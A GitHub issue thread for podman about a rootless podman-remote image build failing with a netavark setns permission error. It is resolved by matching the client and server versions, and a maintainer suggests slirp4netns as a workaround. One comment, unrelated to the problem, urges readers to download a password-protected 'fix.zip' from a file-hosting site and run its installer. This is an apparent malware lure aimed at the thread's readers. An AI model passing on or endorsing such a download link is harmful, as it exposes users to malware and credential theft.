### ISSUE TITLE
podman-remote error: netavark (exit code 1): setns: IO error: Operation not permitted (os error 1)

### ISSUE THREAD

**Issue by akornatskyy** [containers/podman#23806]
### Issue Description

unable to build image with podman remote.

```log
STEP 1/3: FROM node:20-slim AS b
STEP 2/3: COPY . /opt/src
--> 8678960f738
STEP 3/3: RUN set -ex         node -v
error running container: did not get container start message from parent: EOF
Error: building at STEP "RUN set -ex node -v": netavark (exit code 1): setns: IO error: Operation not permitted (os error 1)
```

### Steps to reproduce the issue

```Dockerfile
FROM node:20-slim AS b

COPY . /opt/src

RUN set -ex \
    \
    node -v
````

```sh
podman build -t app .
```

### Describe the results you received

Describe the results you received

### Describe the results you expected

it does not fail and produce the same result as running it locally.

### podman info output

```yaml
Client: version 5.2.2, windows 11, x64
Server: version 4.3.1, debian 12, x64
```

### Podman in a container

No

### Privileged Or Rootless

Rootless

### Upstream Latest Release

Yes

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by akornatskyy** [comment]
it works as expected with client version ``4.9.5.

**Comment by Luap99** [comment]
you generally need to match client and server versions, especially for major ones. While most of the API wise it should work fine there are were bugs in the remote build API in older version that break this. 
https://github.com/containers/podman/commit/dbfe79757b33231b3e5dc8537deb85fba8402eef and https://github.com/containers/podman/pull/22112/commits/493179be456c880c55ca6434200a0847e337fb49 for example
setting something like `--network slirp4netns` should work around it I think

**Comment by akornatskyy** [comment]
with client and server version `5.2.2` is works as expected.
